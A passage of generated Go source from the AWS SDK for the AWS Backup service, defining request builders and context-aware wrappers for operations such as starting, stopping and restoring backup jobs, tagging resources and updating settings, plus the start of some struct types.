// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) PutBackupVaultNotificationsWithContext(ctx aws.Context, input *PutBackupVaultNotificationsInput, opts ...request.Option) (*PutBackupVaultNotificationsOutput, error) {
req, out := c.PutBackupVaultNotificationsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opStartBackupJob = "StartBackupJob"
// StartBackupJobRequest generates a "aws/request.Request" representing the
// client's request for the StartBackupJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See StartBackupJob for more information on using the StartBackupJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the StartBackupJobRequest method.
// req, resp := client.StartBackupJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartBackupJob
func (c *Backup) StartBackupJobRequest(input *StartBackupJobInput) (req *request.Request, output *StartBackupJobOutput) {
op := &request.Operation{
Name: opStartBackupJob,
HTTPMethod: "PUT",
HTTPPath: "/backup-jobs",
}
if input == nil {
input = &StartBackupJobInput{}
}
output = &StartBackupJobOutput{}
req = c.newRequest(op, input, output)
return
}
// StartBackupJob API operation for AWS Backup.
//
// Starts an on-demand backup job for the specified resource.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation StartBackupJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartBackupJob
func (c *Backup) StartBackupJob(input *StartBackupJobInput) (*StartBackupJobOutput, error) {
req, out := c.StartBackupJobRequest(input)
return out, req.Send()
}
// StartBackupJobWithContext is the same as StartBackupJob with the addition of
// the ability to pass a context and additional request options.
//
// See StartBackupJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) StartBackupJobWithContext(ctx aws.Context, input *StartBackupJobInput, opts ...request.Option) (*StartBackupJobOutput, error) {
req, out := c.StartBackupJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opStartCopyJob = "StartCopyJob"
// StartCopyJobRequest generates a "aws/request.Request" representing the
// client's request for the StartCopyJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See StartCopyJob for more information on using the StartCopyJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the StartCopyJobRequest method.
// req, resp := client.StartCopyJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartCopyJob
func (c *Backup) StartCopyJobRequest(input *StartCopyJobInput) (req *request.Request, output *StartCopyJobOutput) {
op := &request.Operation{
Name: opStartCopyJob,
HTTPMethod: "PUT",
HTTPPath: "/copy-jobs",
}
if input == nil {
input = &StartCopyJobInput{}
}
output = &StartCopyJobOutput{}
req = c.newRequest(op, input, output)
return
}
// StartCopyJob API operation for AWS Backup.
//
// Starts a job to create a one-time copy of the specified resource.
//
// Does not support continuous backups.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation StartCopyJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartCopyJob
func (c *Backup) StartCopyJob(input *StartCopyJobInput) (*StartCopyJobOutput, error) {
req, out := c.StartCopyJobRequest(input)
return out, req.Send()
}
// StartCopyJobWithContext is the same as StartCopyJob with the addition of
// the ability to pass a context and additional request options.
//
// See StartCopyJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) StartCopyJobWithContext(ctx aws.Context, input *StartCopyJobInput, opts ...request.Option) (*StartCopyJobOutput, error) {
req, out := c.StartCopyJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opStartRestoreJob = "StartRestoreJob"
// StartRestoreJobRequest generates a "aws/request.Request" representing the
// client's request for the StartRestoreJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See StartRestoreJob for more information on using the StartRestoreJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the StartRestoreJobRequest method.
// req, resp := client.StartRestoreJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartRestoreJob
func (c *Backup) StartRestoreJobRequest(input *StartRestoreJobInput) (req *request.Request, output *StartRestoreJobOutput) {
op := &request.Operation{
Name: opStartRestoreJob,
HTTPMethod: "PUT",
HTTPPath: "/restore-jobs",
}
if input == nil {
input = &StartRestoreJobInput{}
}
output = &StartRestoreJobOutput{}
req = c.newRequest(op, input, output)
return
}
// StartRestoreJob API operation for AWS Backup.
//
// Recovers the saved resource identified by an Amazon Resource Name (ARN).
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation StartRestoreJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StartRestoreJob
func (c *Backup) StartRestoreJob(input *StartRestoreJobInput) (*StartRestoreJobOutput, error) {
req, out := c.StartRestoreJobRequest(input)
return out, req.Send()
}
// StartRestoreJobWithContext is the same as StartRestoreJob with the addition of
// the ability to pass a context and additional request options.
//
// See StartRestoreJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) StartRestoreJobWithContext(ctx aws.Context, input *StartRestoreJobInput, opts ...request.Option) (*StartRestoreJobOutput, error) {
req, out := c.StartRestoreJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opStopBackupJob = "StopBackupJob"
// StopBackupJobRequest generates a "aws/request.Request" representing the
// client's request for the StopBackupJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See StopBackupJob for more information on using the StopBackupJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the StopBackupJobRequest method.
// req, resp := client.StopBackupJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StopBackupJob
func (c *Backup) StopBackupJobRequest(input *StopBackupJobInput) (req *request.Request, output *StopBackupJobOutput) {
op := &request.Operation{
Name: opStopBackupJob,
HTTPMethod: "POST",
HTTPPath: "/backup-jobs/{backupJobId}",
}
if input == nil {
input = &StopBackupJobInput{}
}
output = &StopBackupJobOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// StopBackupJob API operation for AWS Backup.
//
// Attempts to cancel a job to create a one-time backup of a resource.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation StopBackupJob for usage and error information.
//
// Returned Error Types:
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StopBackupJob
func (c *Backup) StopBackupJob(input *StopBackupJobInput) (*StopBackupJobOutput, error) {
req, out := c.StopBackupJobRequest(input)
return out, req.Send()
}
// StopBackupJobWithContext is the same as StopBackupJob with the addition of
// the ability to pass a context and additional request options.
//
// See StopBackupJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) StopBackupJobWithContext(ctx aws.Context, input *StopBackupJobInput, opts ...request.Option) (*StopBackupJobOutput, error) {
req, out := c.StopBackupJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opTagResource = "TagResource"
// TagResourceRequest generates a "aws/request.Request" representing the
// client's request for the TagResource operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See TagResource for more information on using the TagResource
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the TagResourceRequest method.
// req, resp := client.TagResourceRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/TagResource
func (c *Backup) TagResourceRequest(input *TagResourceInput) (req *request.Request, output *TagResourceOutput) {
op := &request.Operation{
Name: opTagResource,
HTTPMethod: "POST",
HTTPPath: "/tags/{resourceArn}",
}
if input == nil {
input = &TagResourceInput{}
}
output = &TagResourceOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// TagResource API operation for AWS Backup.
//
// Assigns a set of key-value pairs to a recovery point, backup plan, or backup
// vault identified by an Amazon Resource Name (ARN).
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation TagResource for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/TagResource
func (c *Backup) TagResource(input *TagResourceInput) (*TagResourceOutput, error) {
req, out := c.TagResourceRequest(input)
return out, req.Send()
}
// TagResourceWithContext is the same as TagResource with the addition of
// the ability to pass a context and additional request options.
//
// See TagResource for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) TagResourceWithContext(ctx aws.Context, input *TagResourceInput, opts ...request.Option) (*TagResourceOutput, error) {
req, out := c.TagResourceRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opUntagResource = "UntagResource"
// UntagResourceRequest generates a "aws/request.Request" representing the
// client's request for the UntagResource operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See UntagResource for more information on using the UntagResource
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the UntagResourceRequest method.
// req, resp := client.UntagResourceRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UntagResource
func (c *Backup) UntagResourceRequest(input *UntagResourceInput) (req *request.Request, output *UntagResourceOutput) {
op := &request.Operation{
Name: opUntagResource,
HTTPMethod: "POST",
HTTPPath: "/untag/{resourceArn}",
}
if input == nil {
input = &UntagResourceInput{}
}
output = &UntagResourceOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// UntagResource API operation for AWS Backup.
//
// Removes a set of key-value pairs from a recovery point, backup plan, or backup
// vault identified by an Amazon Resource Name (ARN)
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation UntagResource for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UntagResource
func (c *Backup) UntagResource(input *UntagResourceInput) (*UntagResourceOutput, error) {
req, out := c.UntagResourceRequest(input)
return out, req.Send()
}
// UntagResourceWithContext is the same as UntagResource with the addition of
// the ability to pass a context and additional request options.
//
// See UntagResource for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) UntagResourceWithContext(ctx aws.Context, input *UntagResourceInput, opts ...request.Option) (*UntagResourceOutput, error) {
req, out := c.UntagResourceRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opUpdateBackupPlan = "UpdateBackupPlan"
// UpdateBackupPlanRequest generates a "aws/request.Request" representing the
// client's request for the UpdateBackupPlan operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See UpdateBackupPlan for more information on using the UpdateBackupPlan
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the UpdateBackupPlanRequest method.
// req, resp := client.UpdateBackupPlanRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateBackupPlan
func (c *Backup) UpdateBackupPlanRequest(input *UpdateBackupPlanInput) (req *request.Request, output *UpdateBackupPlanOutput) {
op := &request.Operation{
Name: opUpdateBackupPlan,
HTTPMethod: "POST",
HTTPPath: "/backup/plans/{backupPlanId}",
}
if input == nil {
input = &UpdateBackupPlanInput{}
}
output = &UpdateBackupPlanOutput{}
req = c.newRequest(op, input, output)
return
}
// UpdateBackupPlan API operation for AWS Backup.
//
// Updates an existing backup plan identified by its backupPlanId with the input
// document in JSON format. The new version is uniquely identified by a VersionId.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation UpdateBackupPlan for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateBackupPlan
func (c *Backup) UpdateBackupPlan(input *UpdateBackupPlanInput) (*UpdateBackupPlanOutput, error) {
req, out := c.UpdateBackupPlanRequest(input)
return out, req.Send()
}
// UpdateBackupPlanWithContext is the same as UpdateBackupPlan with the addition of
// the ability to pass a context and additional request options.
//
// See UpdateBackupPlan for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) UpdateBackupPlanWithContext(ctx aws.Context, input *UpdateBackupPlanInput, opts ...request.Option) (*UpdateBackupPlanOutput, error) {
req, out := c.UpdateBackupPlanRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opUpdateGlobalSettings = "UpdateGlobalSettings"
// UpdateGlobalSettingsRequest generates a "aws/request.Request" representing the
// client's request for the UpdateGlobalSettings operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See UpdateGlobalSettings for more information on using the UpdateGlobalSettings
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the UpdateGlobalSettingsRequest method.
// req, resp := client.UpdateGlobalSettingsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateGlobalSettings
func (c *Backup) UpdateGlobalSettingsRequest(input *UpdateGlobalSettingsInput) (req *request.Request, output *UpdateGlobalSettingsOutput) {
op := &request.Operation{
Name: opUpdateGlobalSettings,
HTTPMethod: "PUT",
HTTPPath: "/global-settings",
}
if input == nil {
input = &UpdateGlobalSettingsInput{}
}
output = &UpdateGlobalSettingsOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// UpdateGlobalSettings API operation for AWS Backup.
//
// Updates the current global settings for the AWS account. Use the DescribeGlobalSettings
// API to determine the current settings.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation UpdateGlobalSettings for usage and error information.
//
// Returned Error Types:
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateGlobalSettings
func (c *Backup) UpdateGlobalSettings(input *UpdateGlobalSettingsInput) (*UpdateGlobalSettingsOutput, error) {
req, out := c.UpdateGlobalSettingsRequest(input)
return out, req.Send()
}
// UpdateGlobalSettingsWithContext is the same as UpdateGlobalSettings with the addition of
// the ability to pass a context and additional request options.
//
// See UpdateGlobalSettings for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) UpdateGlobalSettingsWithContext(ctx aws.Context, input *UpdateGlobalSettingsInput, opts ...request.Option) (*UpdateGlobalSettingsOutput, error) {
req, out := c.UpdateGlobalSettingsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opUpdateRecoveryPointLifecycle = "UpdateRecoveryPointLifecycle"
// UpdateRecoveryPointLifecycleRequest generates a "aws/request.Request" representing the
// client's request for the UpdateRecoveryPointLifecycle operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See UpdateRecoveryPointLifecycle for more information on using the UpdateRecoveryPointLifecycle
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the UpdateRecoveryPointLifecycleRequest method.
// req, resp := client.UpdateRecoveryPointLifecycleRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateRecoveryPointLifecycle
func (c *Backup) UpdateRecoveryPointLifecycleRequest(input *UpdateRecoveryPointLifecycleInput) (req *request.Request, output *UpdateRecoveryPointLifecycleOutput) {
op := &request.Operation{
Name: opUpdateRecoveryPointLifecycle,
HTTPMethod: "POST",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/{recoveryPointArn}",
}
if input == nil {
input = &UpdateRecoveryPointLifecycleInput{}
}
output = &UpdateRecoveryPointLifecycleOutput{}
req = c.newRequest(op, input, output)
return
}
// UpdateRecoveryPointLifecycle API operation for AWS Backup.
//
// Sets the transition lifecycle of a recovery point.
//
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
//
// Does not support continuous backups.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation UpdateRecoveryPointLifecycle for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateRecoveryPointLifecycle
func (c *Backup) UpdateRecoveryPointLifecycle(input *UpdateRecoveryPointLifecycleInput) (*UpdateRecoveryPointLifecycleOutput, error) {
req, out := c.UpdateRecoveryPointLifecycleRequest(input)
return out, req.Send()
}
// UpdateRecoveryPointLifecycleWithContext is the same as UpdateRecoveryPointLifecycle with the addition of
// the ability to pass a context and additional request options.
//
// See UpdateRecoveryPointLifecycle for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) UpdateRecoveryPointLifecycleWithContext(ctx aws.Context, input *UpdateRecoveryPointLifecycleInput, opts ...request.Option) (*UpdateRecoveryPointLifecycleOutput, error) {
req, out := c.UpdateRecoveryPointLifecycleRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opUpdateRegionSettings = "UpdateRegionSettings"
// UpdateRegionSettingsRequest generates a "aws/request.Request" representing the
// client's request for the UpdateRegionSettings operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See UpdateRegionSettings for more information on using the UpdateRegionSettings
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the UpdateRegionSettingsRequest method.
// req, resp := client.UpdateRegionSettingsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateRegionSettings
func (c *Backup) UpdateRegionSettingsRequest(input *UpdateRegionSettingsInput) (req *request.Request, output *UpdateRegionSettingsOutput) {
op := &request.Operation{
Name: opUpdateRegionSettings,
HTTPMethod: "PUT",
HTTPPath: "/account-settings",
}
if input == nil {
input = &UpdateRegionSettingsInput{}
}
output = &UpdateRegionSettingsOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// UpdateRegionSettings API operation for AWS Backup.
//
// Updates the current service opt-in settings for the Region. If service-opt-in
// is enabled for a service, AWS Backup tries to protect that service's resources
// in this Region, when the resource is included in an on-demand backup or scheduled
// backup plan. Otherwise, AWS Backup does not try to protect that service's
// resources in this Region. Use the DescribeRegionSettings API to determine
// the resource types that are supported.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation UpdateRegionSettings for usage and error information.
//
// Returned Error Types:
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateRegionSettings
func (c *Backup) UpdateRegionSettings(input *UpdateRegionSettingsInput) (*UpdateRegionSettingsOutput, error) {
req, out := c.UpdateRegionSettingsRequest(input)
return out, req.Send()
}
// UpdateRegionSettingsWithContext is the same as UpdateRegionSettings with the addition of
// the ability to pass a context and additional request options.
//
// See UpdateRegionSettings for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) UpdateRegionSettingsWithContext(ctx aws.Context, input *UpdateRegionSettingsInput, opts ...request.Option) (*UpdateRegionSettingsOutput, error) {
req, out := c.UpdateRegionSettingsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// A list of backup options for each resource type.
type AdvancedBackupSetting struct {
_ struct{} `type:"structure"`
// Specifies the backup option for a selected resource. This option is only
// available for Windows VSS backup jobs.
//
// Valid values:
//
// Set to "WindowsVSS":"enabled" to enable the WindowsVSS backup option and
// create a VSS Windows backup.
//
// Set to "WindowsVSS":"disabled" to create a regular backup. The WindowsVSS
// option is not enabled by default.
//
// If you specify an invalid option, you get an InvalidParameterValueException
// exception.
//
// For more information about Windows VSS backups, see Creating a VSS-Enabled
// Windows Backup (https://docs.aws.amazon.com/aws-backup/latest/devguide/windows-backups.html).
BackupOptions map[string]*string `type:"map"`
// Specifies an object containing resource type and backup options. The only
// supported resource type is Amazon EC2 instances with Windows VSS. For an
// CloudFormation example, see the sample CloudFormation template to enable
// Windows VSS (https://docs.aws.amazon.com/aws-backup/latest/devguide/integrate-cloudformation-with-aws-backup.html)
// in the AWS Backup User Guide.
//
// Valid values: EC2.
ResourceType *string `type:"string"`
}
// String returns the string representation
func (s AdvancedBackupSetting) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s AdvancedBackupSetting) GoString() string {
return s.String()
}
// SetBackupOptions sets the BackupOptions field's value.
func (s *AdvancedBackupSetting) SetBackupOptions(v map[string]*string) *AdvancedBackupSetting {
s.BackupOptions = v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *AdvancedBackupSetting) SetResourceType(v string) *AdvancedBackupSetting {
s.ResourceType = &v
return s
}
// The required resource already exists.
type AlreadyExistsException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Arn *string `type:"string"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
CreatorRequestId *string `type:"string"`
